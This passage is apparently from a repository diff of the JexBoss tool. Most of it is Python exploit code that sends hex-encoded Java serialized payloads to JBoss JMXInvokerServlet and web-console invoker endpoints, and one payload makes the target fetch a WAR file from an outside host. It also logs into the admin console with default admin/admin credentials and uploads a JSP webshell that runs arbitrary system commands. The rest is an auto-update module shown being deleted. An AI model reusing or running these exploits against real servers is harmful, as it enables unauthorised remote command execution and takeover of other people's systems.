"\x3d\x20\x49\x6e\x74\x65\x67\x65\x72\x2e\x70\x61\x72\x73\x65\x49\x6e\x74\x28"
"\x62\x72\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x2e\x73\x70\x6c\x69\x74"
"\x28\x22\x20\x22\x29\x5b\x31\x5d\x29\x3b\x20\x69\x66\x20\x28\x6c\x61\x73\x74"
"\x56\x65\x72\x73\x69\x6f\x6e\x20\x3e\x20\x76\x65\x72\x73\x69\x6f\x6e\x29\x7b"
"\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x28\x22\x50\x6c\x65\x61\x73\x65\x20"
"\x6e\x6f\x74\x65\x3a\x20\x74\x68\x65\x72\x65\x20\x69\x73\x20\x61\x6e\x20\x75"
"\x70\x64\x61\x74\x65\x20\x74\x6f\x20\x4a\x65\x78\x42\x6f\x73\x73\x20\x4a\x53"
"\x50\x20\x57\x65\x62\x73\x68\x65\x6c\x6c\x2e\x20\x57\x65\x20\x72\x65\x63\x6f"
"\x6d\x6d\x65\x6e\x64\x20\x74\x68\x61\x74\x20\x79\x6f\x75\x20\x72\x65\x72\x75"
"\x6e\x20\x74\x68\x65\x20\x4a\x65\x78\x42\x6f\x73\x73\x20\x74\x6f\x20\x72\x65"
"\x64\x65\x70\x6c\x6f\x79\x20\x74\x68\x65\x20\x6e\x65\x77\x20\x76\x65\x72\x73"
"\x69\x6f\x6e\x20\x6f\x66\x20\x77\x65\x62\x73\x68\x65\x6c\x6c\x20\x69\x6e\x20"
"\x4a\x42\x6f\x73\x73\x20\x73\x65\x72\x76\x65\x72\x20\x74\x65\x73\x74\x65\x64"
"\x2e\x22\x29\x3b\x20\x7d\x20\x7d\x20\x65\x6c\x73\x65\x20\x69\x66\x20\x28\x73"
"\x68\x2e\x63\x6f\x6e\x74\x61\x69\x6e\x73\x28\x22\x69\x64\x22\x29\x20\x7c\x7c"
"\x20\x73\x68\x2e\x63\x6f\x6e\x74\x61\x69\x6e\x73\x28\x22\x69\x70\x63\x6f\x6e"
"\x66\x69\x67\x22\x29\x29\x20\x7b\x20\x63\x6f\x6e\x6e\x43\x68\x65\x63\x6b\x55"
"\x70\x64\x61\x74\x65\x73\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65"
"\x61\x6d\x28\x29\x3b\x20\x7d\x20\x7d\x20\x7d\x20\x63\x61\x74\x63\x68\x28\x45"
"\x78\x63\x65\x70\x74\x69\x6f\x6e\x20\x65\x29\x7b\x6f\x75\x74\x2e\x70\x72\x69"
"\x6e\x74\x6c\x6e\x28\x22\x45\x72\x72\x6f\x72\x20\x63\x68\x65\x63\x6b\x69\x6e"
"\x67\x20\x66\x6f\x72\x20\x75\x70\x64\x61\x74\x65\x73\x22\x29\x3b\x7d\x20\x74"
"\x72\x79\x20\x7b\x20\x50\x72\x6f\x63\x65\x73\x73\x20\x70\x3b\x20\x69\x66\x20"
"\x28\x53\x79\x73\x74\x65\x6d\x2e\x67\x65\x74\x50\x72\x6f\x70\x65\x72\x74\x79"
"\x28\x22\x6f\x73\x2e\x6e\x61\x6d\x65\x22\x29\x2e\x74\x6f\x4c\x6f\x77\x65\x72"
"\x43\x61\x73\x65\x28\x29\x2e\x69\x6e\x64\x65\x78\x4f\x66\x28\x22\x77\x69\x6e"
"\x22\x29\x20\x3e\x20\x30\x20\x7c\x7c\x20\x21\x53\x79\x73\x74\x65\x6d\x2e\x67"
"\x65\x74\x50\x72\x6f\x70\x65\x72\x74\x79\x28\x22\x66\x69\x6c\x65\x2e\x73\x65"
"\x70\x61\x72\x61\x74\x6f\x72\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x2f"
"\x22\x29\x29\x7b\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65"
"\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28\x22\x63\x6d"
"\x64\x2e\x65\x78\x65\x20\x2f\x43\x20\x22\x2b\x73\x68\x29\x3b\x20\x7d\x20\x65"
"\x6c\x73\x65\x20\x7b\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67"
"\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28\x73\x68"
"\x29\x3b\x20\x7d\x20\x62\x72\x20\x3d\x20\x6e\x65\x77\x20\x42\x75\x66\x66\x65"
"\x72\x65\x64\x52\x65\x61\x64\x65\x72\x28\x6e\x65\x77\x20\x49\x6e\x70\x75\x74"
"\x53\x74\x72\x65\x61\x6d\x52\x65\x61\x64\x65\x72\x28\x70\x2e\x67\x65\x74\x49"
"\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29\x29\x3b\x20\x53\x74\x72"
"\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x62\x72\x2e\x72\x65\x61\x64\x4c"
"\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65\x20\x28\x64\x69\x73\x72\x20"
"\x21\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e"
"\x74\x6c\x6e\x28\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x62"
"\x72\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20\x7d\x63\x61"
"\x74\x77\xbc\x63\x68\x28\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x20\x65\x29\x20"
"\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x22\x55\x6e\x6b\x6e"
"\x6f\x77\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2e\x22\x29\x3b\x20\x7d\x20\x7d"
"\x20\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x42\x6f"
"\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee\x02\x00\x01\x5a\x00\x05"
"\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e"
"\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b"
"\x47\x02\x00\x00\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c"
"\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00\x7e\x00"
"\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65\x61\x6e\x21\x96\x59"
"\xec\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00\x01\x73\x72\x00\x22\x6f\x72\x67"
"\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49"
"\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85"
"\xf9\x02\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00\x00"
"\x04\x70\x78")
headers = {"Content-Type": "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",
"Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
r = pool.urlopen('POST', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload)
result = r.status
if result == 401:
print(" Retrying...")
pool.urlopen('HEAD', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload)
return get_successfully(url, "/jexinv3/jexinv3.jsp")
def exploit_web_console_invoker(url):
"""
Exploits web console invoker
Does not work in JBoss 5 (bug in JBoss5)
:param url: The URL to exploit
:return: The HTTP status code
"""
payload = (
"\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e"
"\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f"
"\x74\x65\x4d\x42\x65\x61\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f"
"\xa3\x7a\x74\xae\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e"
"\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74"
"\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73\x74\x00\x13\x5b\x4c"
"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x5b\x00"
"\x09\x73\x69\x67\x6e\x61\x74\x75\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61"
"\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72"
"\x67\x65\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a\x61"
"\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f\x4f\x62\x6a\x65"
"\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06\x64\x65\x70\x6c\x6f\x79\x75"
"\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65"
"\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00"
"\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25"
"\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64"
"\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74"
"\x79\x71\x00\x7e\x00\x01\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x01\x4c"
"\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x01\x4c\x00\x08\x70\x72\x6f\x74\x6f"
"\x63\x6f\x6c\x71\x00\x7e\x00\x01\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x01"
"\x78\x70\xff\xff\xff\xff\xff\xff\xff\xff\x74\x00\x0e\x6a\x6f\x61\x6f\x6d\x61"
"\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x74\x00\x0f\x2f\x72\x6e\x70\x2f\x6a\x65\x78"
"\x77\x73\x33\x2e\x77\x61\x72\x71\x00\x7e\x00\x0b\x74\x00\x04\x68\x74\x74\x70"
"\x70\x78\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53"
"\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70"
"\x00\x00\x00\x01\x74\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c"
"\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e"
"\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15"
"\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74"
"\x65\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c"
"\x6f\x79\x65\x72\x78")
headers = {
"Content-Type": "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation",
"Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
r = pool.urlopen('POST', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload)
result = r.status
if result == 401:
print(" Retrying...")
pool.urlopen('HEAD', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload)
return get_successfully(url, "/jexws3/jexws3.jsp")
def get_viewstat_admin_console(page):
page = str(page).replace("\\n", "\n")
for i in page.split('\n'):
if 'javax.faces.ViewState' in i:
if i.count('value') ==1:
return i.split("value=\"")[1].split("\"")[0]
else:
return i.split("value=\"")[2].split("\"")[0]
def get_boundary_admin_console(jboss_version, state, payload):
boundary = "-----------------------------8994251555011888521050172030\r\n"
if jboss_version == 6:
data = boundary
data += "Content-Disposition: form-data; name=\"createContentForm\"\r\n"
data += "\r\n"
data += "createContentForm\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:file\"; filename=\"jexws3.war\"\r\n"
data += "Content-Type: application/octet-stream\r\n"
data += "\r\n"
data += payload + "\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:rhq_prop-0_328868266\"\r\n"
data += "\r\n"
data += "false\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:rhq_prop-0_-1257012452\"\r\n"
data += "\r\n"
data += "false\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:addButton\"\r\n"
data += "\r\n"
data += "Continue\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"javax.faces.ViewState\"\r\n"
data += "\r\n"
data += state + "\r\n"
data += "-----------------------------8994251555011888521050172030--\r\n"
return data
elif jboss_version == 5:
data = boundary
data += "Content-Disposition: form-data; name=\"createContentForm\"\r\n"
data += "\r\n"
data += "createContentForm\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:file\"; filename=\"jexws3.war\"\r\n"
data += "Content-Type: application/octet-stream\r\n"
data += "\r\n"
data += payload + "\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:rhq_prop-1995377939_328868266\"\r\n"
data += "\r\n"
data += "false\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:addButton\"\r\n"
data += "\r\n"
data += "Continue\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"javax.faces.ViewState\"\r\n"
data += "\r\n"
data += state + "\r\n"
data += "-----------------------------8994251555011888521050172030--\r\n"
return data
def url_encode(text):
if version_info[0] >= 3:
return quote(text)
else:
return urllib.quote_plus(text)
def exploit_admin_console(url):
"""
Exploits admin-console
tested and works in JBoss 5 and 6
:param url: The URL to exploit
:return: The HTTP status code
"""
# Use default password for Jboss 5 and 6
username = "admin"
password = "admin"
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
r = pool.request('GET', url+"/admin-console/login.seam", headers=headers)
cookie = r.getheader('set-cookie').split(";")[0]
headers['Cookie'] = cookie
state = get_viewstat_admin_console(r.data)
#payload = ("login_form=login_form&login_form:name=%s&login_form:password=%s&login_form:submit=Login"
# "&javax.faces.ViewState=%s" % (username, password, state))
payload = "login_form=login_form&login_form%3Aname="+username+"&login_form%3Apassword="+password+"&login_form%3Asubmit=Login&javax.faces.ViewState="+url_encode(state)
headers['Content-Type'] = "application/x-www-form-urlencoded"
print(GREEN + "\n * Info: Trying to perform authentication with default credentials..." +ENDC)
r = pool.request('POST', url+"/admin-console/login.seam", body=payload, headers=headers, redirect=False)
state = get_viewstat_admin_console(r.data)
if r.status == 302:
print(GREEN + " * Info: Successfully logged in! Wait..." + ENDC)
location = r.getheader('Location')
conversation_id = location.split('=')[1]
r = pool.request('GET', location, headers=headers)
if state == None:
sleep(7)
r = pool.request('GET', url+"/admin-console/secure/summary.seam?path=-3%2FApplications%2FWeb+Application+%28WAR"
"%29&conversationId="+conversation_id+"&conversationPropagation=end", headers=headers)
conversation_id = str(int(conversation_id)+1)
r = pool.request('GET', url+"/admin-console/secure/resourceTypeSummary.seam?actionMethod=secure%2FresourceType"
"Summary.xhtml%3AcreateContentBackedResourceAction.init%28%29&conversationId="
+ conversation_id, headers=headers)
state = get_viewstat_admin_console(r.data)
headers['Content-Type'] = "multipart/form-data; boundary=---------------------------8994251555011888521050172030"
payload = ("\x50\x4b\x03\x04\x14\x00\x08\x08\x08\x00\x6d\x7c\x98\x48\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x04\x00\x4d\x45\x54\x41\x2d\x49\x4e"
"\x46\x2f\xfe\xca\x00\x00\x03\x00\x50\x4b\x07\x08\x00\x00\x00\x00\x02\x00\x00"
"\x00\x00\x00\x00\x00\x50\x4b\x03\x04\x14\x00\x08\x08\x08\x00\x6d\x7c\x98\x48"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x4d\x45\x54"
"\x41\x2d\x49\x4e\x46\x2f\x4d\x41\x4e\x49\x46\x45\x53\x54\x2e\x4d\x46\xf3\x4d"
"\xcc\xcb\x4c\x4b\x2d\x2e\xd1\x0d\x4b\x2d\x2a\xce\xcc\xcf\xb3\x52\x30\xd4\x33"
"\xe0\xe5\x72\x2e\x4a\x4d\x2c\x49\x4d\xd1\x75\xaa\x04\x09\x58\xe8\x19\xc4\x9b"
"\x9b\x2b\x68\xf8\x17\x25\x26\xe7\xa4\x2a\x38\xe7\x17\x15\xe4\x17\x25\x96\x00"
"\x95\x6b\xf2\x72\xf1\x72\x01\x00\x50\x4b\x07\x08\x05\xa0\x0e\xbc\x43\x00\x00"
"\x00\x44\x00\x00\x00\x50\x4b\x03\x04\x14\x00\x08\x08\x08\x00\x68\x7c\x98\x48"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x6a\x65\x78"
"\x77\x73\x33\x2e\x6a\x73\x70\x95\x55\x5f\x6f\x1a\x39\x10\x7f\xbf\x4f\x31\xb1"
"\x94\xca\x94\xb2\xb4\xba\x97\x53\x08\xd1\xa5\xb9\x54\x69\x14\xe9\x22\x52\xae"
"\x0f\xa7\xaa\x32\xbb\x03\xeb\x74\xd7\xf6\xd9\xb3\x05\x94\xf2\xdd\x6f\xec\x05"
"\x02\x85\x6b\x75\x2f\xbb\xc6\x33\x9e\x9d\xf9\xfd\x31\xe7\xa7\xbf\x83\x53\x33"
"\x04\x5d\x3b\xeb\x69\x28\x1e\xd5\x57\x95\x35\xa4\xab\xec\xe5\xab\xb4\xd6\x96"
"\x57\x90\x96\x06\x29\x7b\x29\x52\xfe\xb5\xc9\x6d\xa1\xcd\x6c\x28\xc6\x1f\xde"
"\xf5\x7e\x13\xa7\x17\x70\xee\x3c\xf2\xf3\x14\xb4\x21\xf8\x8a\x3e\x68\x6b\x60"
"\x08\xbf\x0e\x40\x4f\x41\x7a\xfc\xa7\xc1\x40\xd9\x0c\xe9\x5e\x79\x55\x23\xa1"
"\x97\xc2\x39\x27\x3a\x70\x32\x04\xd3\x54\x55\x07\x9e\x60\x62\x6d\x85\xca\x40"
"\x5e\x62\xfe\x65\xec\x0a\x45\x18\x06\x70\x43\xe4\xc6\xa3\xbb\x2b\x6b\x0c\xe6"
"\x14\xeb\xe6\xbc\xbc\xda\xc9\x81\xb6\xc4\x00\xde\x36\xd3\x29\x7a\x2c\x46\xa8"
"\x0a\xf4\x30\xf1\xdb\x88\xc7\xe0\xac\x09\x98\x05\x24\xae\x44\x68\xe8\xc3\xd2"
"\xa1\x14\x84\x0b\xea\x97\x54\x57\xa2\x73\xd0\xeb\x4d\x2a\x23\x45\xea\xa7\xd7"
"\xb4\x1f\x7b\x6e\x19\x5e\xbc\x80\x9f\x67\x67\x9c\xa1\xaa\x20\xc5\x94\x9f\x28"
"\x3a\x9d\xa7\xbd\xf9\xb8\xc3\x14\x18\xc0\x0a\xf9\x05\x07\x51\xf2\x0d\x07\x8f"
"\x8c\x2c\x0f\x80\xe9\x80\xc1\x39\xf0\x96\x14\x25\xc7\xce\xfa\xfd\x39\x4e\x42"
"\x89\x55\x95\x3d\xe2\x62\x62\x43\x88\x2c\xf6\x1f\x83\xfb\xbc\xa6\x28\xa3\x05"
"\x71\x8b\xd6\xa1\x79\x2e\x23\x19\x89\x15\x3c\x90\x67\x8a\x21\x94\xfc\xa9\x1f"
"\xf0\x37\xd8\x24\x56\x2a\xd0\x8d\x6d\x7c\xea\x32\xb6\x17\x7b\xf9\x83\x7b\x95"
"\x9d\x8c\x6c\x9b\xc4\xcb\xe0\x2a\x4d\x52\x9c\x89\xce\xdf\xaf\x3f\x75\x45\x99"
"\x55\x76\xc6\x1d\x78\x74\x95\xca\xf1\xb2\xaa\xa4\x00\xf1\x0a\x44\x2f\x96\x26"
"\xbf\x7c\x4a\xa4\xec\x63\xd2\x82\x12\x81\xfc\x0e\x95\xc8\xee\xa8\xed\xf5\xde"
"\xf3\x50\x9e\x96\x52\x8c\x03\xfa\xde\xe5\x8c\x19\xe7\xba\x47\xf8\xba\xb1\x81"
"\x31\xe8\x8a\xf3\x9e\xe8\xee\x84\x47\x58\x5b\xc2\xcb\xa2\xf0\xb2\xb3\x96\xc6"
"\x49\x1c\xe9\x9d\xae\x70\x4d\xf2\x67\xd1\xdd\x9b\x9a\xb9\x5e\xe8\x40\x41\x46"
"\x92\xef\x79\x60\xfa\xe8\x35\x43\x05\xf3\xf6\x35\x4c\xfc\xec\x04\xfe\xab\xce"
"\x60\x7d\x22\xcb\x2b\x1b\x30\xf2\x31\xd9\x9c\xde\x97\x78\x02\xf9\xbd\x71\x0d"
"\x31\xc0\xa8\xea\xf5\xee\x01\x2e\x3c\xcf\x4e\x16\xf7\x17\x27\x62\xa7\xc6\xcf"
"\xfe\xb5\x75\xeb\x7b\xf6\xc5\x8c\xbf\xea\x94\x0f\xc8\x3f\xe4\xc4\x33\x31\xaa"
"\xb8\xd3\x06\x9f\xa9\x03\xa6\xee\xcd\xa7\x35\x24\xbb\x05\x2e\x36\xc6\xe7\xe9"
"\x6d\x43\x99\x8b\x83\x4a\x71\xcf\x9e\x66\x61\x1b\x46\xf3\x0c\xa8\xe4\xe6\x41"
"\x07\x60\x9b\xb7\x16\x01\xb2\x70\x8b\x8b\xb7\xac\x4e\xb8\x7d\xb8\x87\x8f\x1b"
"\xc9\xf2\x8a\xe9\xca\x6d\x5d\xa3\x29\xf8\xa0\x22\x58\xda\x86\xb7\x7c\x63\x62"
"\x9d\xed\x29\x2e\xc0\x80\xb0\x80\xec\x32\xed\x47\x4c\x36\x57\x90\x9d\xc2\xc6"
"\x03\x3c\x30\xdc\xa6\x03\x2c\x08\x8e\x03\x03\x43\x58\x64\x22\xc9\x7d\x05\xc9"
"\x7e\x71\xa6\x50\x66\x0c\x20\x29\x6d\xd8\xb5\xba\x60\xc3\x7f\xfb\x06\xfb\x9b"
"\x8e\xd7\x53\xcd\xc2\x8d\xd7\xd6\x4f\xd1\x6e\xeb\xaf\x20\x57\x94\x97\xf2\x7a"
"\x91\xa3\x4b\xf7\x18\x4b\x78\x8b\x53\x65\xa4\xb8\xf6\xde\xfa\xd6\xff\xd1\x51"
"\x53\xfe\xb1\xbd\x46\x06\xab\xe8\x06\x88\xba\xb2\x39\xf2\x10\xae\x25\xe0\x61"
"\xc9\x43\xd4\xc9\x99\x5b\xc5\x5b\xf6\x39\x9b\x54\x44\xe3\xdd\xd9\x39\xfa\x2b"
"\x15\x55\x94\x69\x53\xe0\xe2\xcf\xa9\x14\x73\x6d\x78\xaa\x0b\x78\x1d\x27\x3b"
"\x39\x56\x62\xca\x2a\x67\x37\xb1\x12\x14\x59\xbf\x73\x8b\xf5\xd3\x0d\xe6\x58"
"\x2d\xa3\xc6\x90\xae\x31\x79\xa5\x5d\xca\x68\x00\xcc\x59\xd5\x75\x11\x57\xd0"
"\xbf\x02\xd1\x0d\x65\x02\x60\x7d\xbb\xfd\xf8\xe4\x3a\xf7\xff\xa9\xdd\x1d\x95"
"\xf7\xfa\x5a\x2a\x74\x88\xc5\xf6\x94\xcc\xf6\x2a\x79\x3e\x90\x29\xb8\xf3\x07"
"\xb4\xcb\x46\x8c\x71\xe6\xf1\xf3\xcc\xe6\x21\x99\xdf\x15\x10\x63\xf3\xc5\xd8"
"\x79\xfc\xbb\xaa\x6b\x65\x9e\x85\x76\x7a\xf1\xcb\xbf\x50\x4b\x07\x08\x25\x39"
"\x60\x50\x70\x03\x00\x00\x7a\x07\x00\x00\x50\x4b\x01\x02\x14\x00\x14\x00\x08"
"\x08\x08\x00\x6d\x7c\x98\x48\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00"
"\x09\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4d"
"\x45\x54\x41\x2d\x49\x4e\x46\x2f\xfe\xca\x00\x00\x50\x4b\x01\x02\x14\x00\x14"
"\x00\x08\x08\x08\x00\x6d\x7c\x98\x48\x05\xa0\x0e\xbc\x43\x00\x00\x00\x44\x00"
"\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3d\x00\x00"
"\x00\x4d\x45\x54\x41\x2d\x49\x4e\x46\x2f\x4d\x41\x4e\x49\x46\x45\x53\x54\x2e"
"\x4d\x46\x50\x4b\x01\x02\x14\x00\x14\x00\x08\x08\x08\x00\x68\x7c\x98\x48\x25"
"\x39\x60\x50\x70\x03\x00\x00\x7a\x07\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\xc2\x00\x00\x00\x6a\x65\x78\x77\x73\x33\x2e\x6a\x73"
"\x70\x50\x4b\x05\x06\x00\x00\x00\x00\x03\x00\x03\x00\xb5\x00\x00\x00\x6a\x04"
"\x00\x00\x00\x00")
data = get_boundary_admin_console(jboss_version=6, state=state, payload=payload)
try:
r = pool.request('POST', url + "/admin-console/secure/resourceContentCreate.seam", headers=headers,body=data)
if r.status != 302:
data = get_boundary_admin_console(jboss_version=5, state=state, payload=payload)
r = pool.request('POST', url + "/admin-console/secure/resourceContentCreate.seam", headers=headers, body=data)
except:
sleep(1)
return get_successfully(url, "/jexws3/jexws3.jsp")
else:
print(RED + "\n * Authentication failed!" + ENDC)
return 404

137
Jboss_Verify_EXploitation/_updates.py
View File

@ -1,137 +0,0 @@
# -*- coding: utf-8 -*-
"""
Module for managing updates to the JexBoss
https://github.com/joaomatosf/jexboss
Copyright 2013 João Filho Matos Figueiredo
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
RED = '\x1b[91m'
RED1 = '\033[31m'
BLUE = '\033[94m'
GREEN = '\033[32m'
BOLD = '\033[1m'
NORMAL = '\033[0m'
ENDC = '\033[0m'
from jexboss import __version
from sys import version_info
import os
import shutil
from zipfile import ZipFile
try:
from urllib3 import disable_warnings, PoolManager
from urllib3.util.timeout import Timeout
disable_warnings()
except ImportError:
print(RED1 + BOLD + "\n * Package urllib3 not installed. Please install the dependencies before continue.\n"
"" + GREEN + " Example: \n"
" # pip install -r requires.txt\n" + ENDC)
exit(0)
timeout = Timeout(connect=3.0, read=6.0)
pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE')
def auto_update():
"""
Download and deploy the latest version
:return: True if successfully updated
"""
url = 'https://github.com/joaomatosf/jexboss/archive/master.zip'
# backup of prior version
if os.path.exists('old_version'):
shutil.rmtree('old_version')
shutil.copytree(".", "." + os.path.sep + "old_version")
# download and extract of new version
print(GREEN + " * Downloading the new version from %s." %url +ENDC )
r = pool.request('GET', url)
if r.status != 200:
print(RED + " * Error: Could not complete the download of the new version. Check your internet connection." + ENDC)
return False
with open('master.zip', 'wb') as f:
f.write(r.data)
z = ZipFile('master.zip', 'r')
print(GREEN + " * Extracting new version..." +ENDC)
z.extractall(path='.')
z.close()
os.remove('master.zip')
path_new_version = '.' + os.path.sep + 'jexboss-master'
print(GREEN + " * Replacing the current version with the new version..." + ENDC)
for root, dirs, files in os.walk(path_new_version):
for file in files:
old_path = root.replace(path_new_version, '.') + os.path.sep
old_file = root.replace(path_new_version, '.') + os.path.sep + file
new_file = os.path.join(root, file)
if not os.path.exists(old_path):
os.makedirs(old_path)
shutil.move(new_file, old_file)
# remove extracted directory of the new version
shutil.rmtree('.'+os.path.sep+'jexboss-master')
return True
def check_updates():
"""
Checks if there is new version available
:return: boolean if there updates
"""
url = 'http://joaomatosf.com/rnp/releases.txt'
print(BLUE + " * Checking for updates in: %s **\n" % url + ENDC)
header = {"User-Agent": "Checking for updates"}
r = pool.request('GET', url, redirect=False, headers=header)
if r.status != 200:
print(RED + " * Error: could not check for updates ...\n" + ENDC)
return False
else:
current_version = __version
link = 'https://github.com/joaomatosf/jexboss/archive/master.zip'
date_last_version = ''
notes = []
# search for new versions
resp = str(r.data).replace('\\n','\n')
for line in resp.split('\n'):
if "#" in line:
continue
if 'last_version' in line:
last_version = line.split()[1]
elif 'date:' in line:
date_last_version = line.split()[1]
elif 'link:' in line:
link = line
elif '* ' in line:
notes.append(line)
elif 'version:' in line and 'last_' not in line:
break
# compare last_version with current version
